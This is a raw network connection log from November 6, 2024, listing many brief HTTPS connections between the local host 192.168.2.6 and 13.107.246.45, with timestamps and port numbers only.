Nov 6, 2024 17:03:28.556869030 CET	50176	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:28.556900024 CET	443	50176	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:28.556991100 CET	50176	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:28.557159901 CET	50176	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:28.557174921 CET	443	50176	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:28.815331936 CET	443	50173	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:28.815411091 CET	443	50173	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:28.815464020 CET	50173	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:28.815701962 CET	50173	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:28.815701962 CET	50173	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:28.815717936 CET	443	50173	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:28.815728903 CET	443	50173	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:28.818762064 CET	50177	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:28.818799973 CET	443	50177	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:28.818871975 CET	50177	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:28.819076061 CET	50177	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:28.819092035 CET	443	50177	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:29.547403097 CET	443	50177	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:29.548007011 CET	50177	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:29.548031092 CET	443	50177	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:29.548480034 CET	50177	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:29.548486948 CET	443	50177	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:29.676863909 CET	443	50177	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:29.676955938 CET	443	50177	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:29.677052975 CET	50177	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:29.677383900 CET	50177	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:29.677413940 CET	443	50177	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:29.677431107 CET	50177	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:29.677437067 CET	443	50177	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:29.680347919 CET	50178	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:29.680392981 CET	443	50178	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:29.680478096 CET	50178	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:29.680669069 CET	50178	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:29.680685997 CET	443	50178	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:29.694519997 CET	443	50176	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:29.694966078 CET	50176	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:29.694983959 CET	443	50176	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:29.695415020 CET	50176	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:29.695420980 CET	443	50176	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:29.833112955 CET	443	50176	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:29.833333969 CET	443	50176	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:29.833389997 CET	50176	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:29.834317923 CET	50176	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:29.834330082 CET	443	50176	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:29.834347963 CET	50176	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:29.834353924 CET	443	50176	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:29.838110924 CET	50179	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:29.838145971 CET	443	50179	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:29.838216066 CET	50179	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:29.838356972 CET	50179	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:29.838371038 CET	443	50179	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:30.656879902 CET	443	50179	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:30.656898975 CET	443	50178	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:30.657397032 CET	50179	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:30.657434940 CET	443	50179	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:30.657444000 CET	50178	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:30.657478094 CET	443	50178	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:30.657887936 CET	50179	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:30.657893896 CET	443	50179	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:30.657932997 CET	50178	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:30.657938957 CET	443	50178	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:30.785885096 CET	443	50179	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:30.785975933 CET	443	50179	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:30.786036968 CET	50179	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:30.786217928 CET	50179	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:30.786240101 CET	443	50179	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:30.786251068 CET	50179	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:30.786257029 CET	443	50179	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:30.786958933 CET	443	50178	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:30.787022114 CET	443	50178	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:30.787075043 CET	50178	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:30.787219048 CET	50178	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:30.787237883 CET	443	50178	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:30.787250996 CET	50178	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:30.787256956 CET	443	50178	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:30.789273024 CET	50181	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:30.789314032 CET	443	50181	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:30.789333105 CET	50182	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:30.789361000 CET	443	50182	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:30.789412975 CET	50181	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:30.789434910 CET	50182	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:30.789554119 CET	50181	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:30.789571047 CET	443	50181	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:30.789582968 CET	50182	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:30.789593935 CET	443	50182	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:31.519124985 CET	443	50181	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:31.519922018 CET	50181	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:31.519939899 CET	443	50181	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:31.520343065 CET	50181	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:31.520348072 CET	443	50181	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:31.537970066 CET	443	50182	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:31.538482904 CET	50182	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:31.538501024 CET	443	50182	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:31.538901091 CET	50182	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:31.538909912 CET	443	50182	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:31.647389889 CET	443	50181	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:31.647423983 CET	443	50181	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:31.647460938 CET	50181	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:31.647478104 CET	443	50181	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:31.647564888 CET	50181	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:31.647661924 CET	50181	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:31.647680044 CET	443	50181	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:31.647690058 CET	50181	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:31.647696972 CET	443	50181	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:31.650998116 CET	50183	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:31.651016951 CET	443	50183	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:31.651077032 CET	50183	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:31.651211023 CET	50183	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:31.651221991 CET	443	50183	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:31.673998117 CET	443	50182	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:31.674290895 CET	443	50182	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:31.674355984 CET	50182	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:31.674388885 CET	50182	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:31.674401999 CET	443	50182	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:31.674412012 CET	50182	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:31.674417019 CET	443	50182	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:31.676903963 CET	50184	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:31.676940918 CET	443	50184	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:31.676990032 CET	50184	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:31.677225113 CET	50184	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:31.677237034 CET	443	50184	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:32.375350952 CET	443	50183	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:32.375981092 CET	50183	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:32.376017094 CET	443	50183	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:32.376547098 CET	50183	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:32.376552105 CET	443	50183	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:32.414176941 CET	443	50184	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:32.414679050 CET	50184	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:32.414699078 CET	443	50184	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:32.415096998 CET	50184	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:32.415102005 CET	443	50184	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:32.504452944 CET	443	50183	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:32.504537106 CET	443	50183	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:32.504642010 CET	443	50183	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:32.504719973 CET	50183	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:32.504739046 CET	50183	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:32.504914999 CET	50183	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:32.504931927 CET	443	50183	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:32.504940987 CET	50183	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:32.504945993 CET	443	50183	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:32.507981062 CET	50185	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:32.508023024 CET	443	50185	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:32.508141994 CET	50185	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:32.508312941 CET	50185	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:32.508330107 CET	443	50185	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:32.552803993 CET	443	50184	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:32.552874088 CET	443	50184	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:32.553046942 CET	50184	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:32.553157091 CET	50184	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:32.553174019 CET	443	50184	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:32.553190947 CET	50184	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:32.553196907 CET	443	50184	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:32.556147099 CET	50186	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:32.556178093 CET	443	50186	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:32.556258917 CET	50186	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:32.556416988 CET	50186	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:32.556427002 CET	443	50186	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.256217957 CET	443	50185	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.256802082 CET	50185	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:33.256874084 CET	443	50185	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.257276058 CET	50185	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:33.257282972 CET	443	50185	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.290328026 CET	443	50186	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.294245005 CET	50186	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:33.294267893 CET	443	50186	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.294655085 CET	50186	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:33.294660091 CET	443	50186	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.389590025 CET	443	50185	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.389664888 CET	443	50185	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.389766932 CET	50185	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:33.389794111 CET	443	50185	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.389868975 CET	50185	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:33.390069008 CET	50185	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:33.390091896 CET	443	50185	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.390103102 CET	50185	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:33.390109062 CET	443	50185	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.393105030 CET	50187	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:33.393147945 CET	443	50187	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.393245935 CET	50187	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:33.393410921 CET	50187	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:33.393424988 CET	443	50187	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.440330029 CET	443	50186	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.440417051 CET	443	50186	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.440466881 CET	50186	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:33.440586090 CET	50186	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:33.440608025 CET	443	50186	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.440618992 CET	50186	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:33.440624952 CET	443	50186	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.443165064 CET	50188	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:33.443208933 CET	443	50188	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.443274021 CET	50188	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:33.443515062 CET	50188	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:33.443531990 CET	443	50188	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.496265888 CET	443	50125	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.536505938 CET	50125	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:33.536525965 CET	443	50125	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.536828041 CET	50125	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:33.536845922 CET	443	50125	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.536859035 CET	50125	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:33.537131071 CET	443	50125	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.537184954 CET	443	50125	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.537230015 CET	50125	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:33.539751053 CET	50189	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:33.539788008 CET	443	50189	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:33.539856911 CET	50189	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:33.539999008 CET	50189	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:33.540011883 CET	443	50189	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.140364885 CET	443	50187	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.141206026 CET	50187	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.141247034 CET	443	50187	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.141825914 CET	50187	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.141830921 CET	443	50187	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.237365961 CET	443	50188	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.238251925 CET	50188	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.238281012 CET	443	50188	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.238821983 CET	50188	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.238826990 CET	443	50188	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.273979902 CET	443	50187	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.274008989 CET	443	50187	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.274065971 CET	443	50187	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.274080038 CET	50187	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.274126053 CET	50187	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.274360895 CET	50187	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.274389029 CET	443	50187	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.274405003 CET	50187	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.274409056 CET	443	50187	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.277528048 CET	50190	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.277586937 CET	443	50190	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.277686119 CET	50190	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.277863979 CET	50190	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.277879000 CET	443	50190	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.283972025 CET	443	50189	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.284444094 CET	50189	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.284467936 CET	443	50189	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.284904957 CET	50189	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.284913063 CET	443	50189	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.376657963 CET	443	50188	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.376766920 CET	443	50188	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.376884937 CET	50188	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.377170086 CET	50188	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.377186060 CET	443	50188	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.377198935 CET	50188	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.377203941 CET	443	50188	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.379962921 CET	50191	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.379995108 CET	443	50191	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.380064964 CET	50191	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.380366087 CET	50191	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.380377054 CET	443	50191	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.420481920 CET	443	50189	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.420505047 CET	443	50189	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.420629025 CET	50189	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.420639038 CET	443	50189	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.420919895 CET	50189	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.420928001 CET	443	50189	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.420937061 CET	50189	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.420984030 CET	443	50189	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.421036005 CET	443	50189	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.421076059 CET	50189	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.423794985 CET	50192	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.423821926 CET	443	50192	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:34.423896074 CET	50192	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.424043894 CET	50192	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:34.424057961 CET	443	50192	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.000089884 CET	443	50190	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.000680923 CET	50190	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.000709057 CET	443	50190	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.001137018 CET	50190	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.001142979 CET	443	50190	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.115978003 CET	443	50191	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.116461039 CET	50191	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.116489887 CET	443	50191	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.116945028 CET	50191	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.116950989 CET	443	50191	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.157119036 CET	443	50192	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.157586098 CET	50192	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.157610893 CET	443	50192	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.158052921 CET	50192	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.158057928 CET	443	50192	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.217511892 CET	443	50190	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.217539072 CET	443	50190	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.217595100 CET	443	50190	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.217653990 CET	50190	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.217709064 CET	50190	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.217917919 CET	50190	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.217940092 CET	443	50190	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.217959881 CET	50190	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.217967033 CET	443	50190	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.220762014 CET	50193	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.220813036 CET	443	50193	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.220911026 CET	50193	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.221081018 CET	50193	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.221096992 CET	443	50193	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.246597052 CET	443	50191	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.246643066 CET	443	50191	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.246700048 CET	443	50191	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.246762991 CET	50191	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.246807098 CET	50191	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.247057915 CET	50191	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.247081995 CET	443	50191	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.247113943 CET	50191	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.247126102 CET	443	50191	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.249710083 CET	50194	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.249771118 CET	443	50194	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.249860048 CET	50194	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.250005007 CET	50194	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.250024080 CET	443	50194	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.288645029 CET	443	50192	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.288712025 CET	443	50192	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.288800955 CET	50192	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.288979053 CET	50192	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.288999081 CET	443	50192	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.289010048 CET	50192	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.289015055 CET	443	50192	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.291693926 CET	50195	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.291737080 CET	443	50195	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.291830063 CET	50195	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.291984081 CET	50195	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.292001009 CET	443	50195	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.957911015 CET	443	50193	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.958513975 CET	50193	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.958544016 CET	443	50193	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:35.959079027 CET	50193	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:35.959084988 CET	443	50193	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.000077963 CET	443	50194	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.000617981 CET	50194	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.000653028 CET	443	50194	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.001085043 CET	50194	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.001096010 CET	443	50194	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.036446095 CET	443	50195	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.037022114 CET	50195	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.037056923 CET	443	50195	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.037470102 CET	50195	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.037477970 CET	443	50195	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.113739967 CET	443	50193	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.113775015 CET	443	50193	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.113823891 CET	443	50193	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:36.113908052 CET	50193	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.113945007 CET	50193	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.114248991 CET	50193	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:36.114274979 CET	443	50193	13.107.246.45	192.168.2.6
